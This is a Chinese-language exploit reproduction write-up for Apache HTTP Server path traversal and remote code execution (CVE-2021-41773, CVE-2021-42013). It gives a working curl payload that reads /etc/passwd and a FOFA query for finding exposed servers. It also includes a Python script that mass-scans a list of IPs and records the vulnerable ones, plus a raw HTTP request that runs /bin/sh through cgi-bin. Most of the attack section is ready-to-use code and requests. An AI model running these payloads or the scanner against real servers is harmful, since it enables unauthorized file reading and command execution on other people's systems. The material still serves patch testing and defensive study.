Apache HTTP Server路径遍历漏洞复现0day(CVE-2021-41773|CVE-2021-42013远程代码执行)

Apache HTTP Server是阿帕奇(Apache)基金会的一款开源网页服务器,可以在大多数电脑操作系统中运行,由于其具有的跨平台性和安全性,被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。

Apache 已发布补丁以解决多个高危安全漏洞,包括其 HTTP 服务器中的路径遍历和文件泄露漏洞(CVE-2021-41773),据称该漏洞正在被广泛利用。Apache 官方发布 2.4.50 修补之后的次日,安全研究人员发现对 CVE-2021-41773 漏洞的修复并不完善,Apache 已确认该问题,并再次发布 2.4.51 版本。

CVE-2021-41773 #

漏洞描述 #

在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功。此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源。已知此问题已被广泛利用。此问题仅影响 Apache 2.4.49 而不是早期版本。

fofa查询:server="Apache/2.4.49"

影响版本 #

Apache HTTP Server 2.4.49

漏洞复现 #

环境搭建可参考:GitHub - blasty/CVE-2021-41773: CVE-2021-41773 playground

然后启动docker,执行如下

docker-compose build && docker-compose up -d

访问8080端口

POC #

curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

批量检测poc #

import urllib.request
import ssl
from colorama import init

#添加Headers信息
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36',
}
for ip in open('server=Apache2.4.49.txt','r'):
ipv = ip.strip('\r\n')
url = f'{ipv}/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
#防止ssl报错
context = ssl._create_unverified_context()
try:
re = urllib.request.Request(url=url,headers=headers)
response = urllib.request.urlopen(re,context=context,timeout=3)
response = response.read().decode('utf-8')
if "root:x:" in str(response):
print(f"\033[0;31m{url}\033[0m 可能存在漏洞")
with open('vul.txt','a',encoding='utf-8') as f:
f.write(ipv+"\r")
else:
print(f"{ipv}不存在漏洞")
except Exception as w:
print(f"{ipv}不存在漏洞")

CVE-2021-42013 #

Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。

影响版本 #

Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50

命令执行 #

GET http://172.16.10.102:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 172.16.10.102:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5cde5771ac040-gzip"
If-Modified-Since: Sat, 09 Oct 2021 06:18:33 GMT
Connection: close
Content-Length: 43

echo Content-Type: text/plain; echo; 命令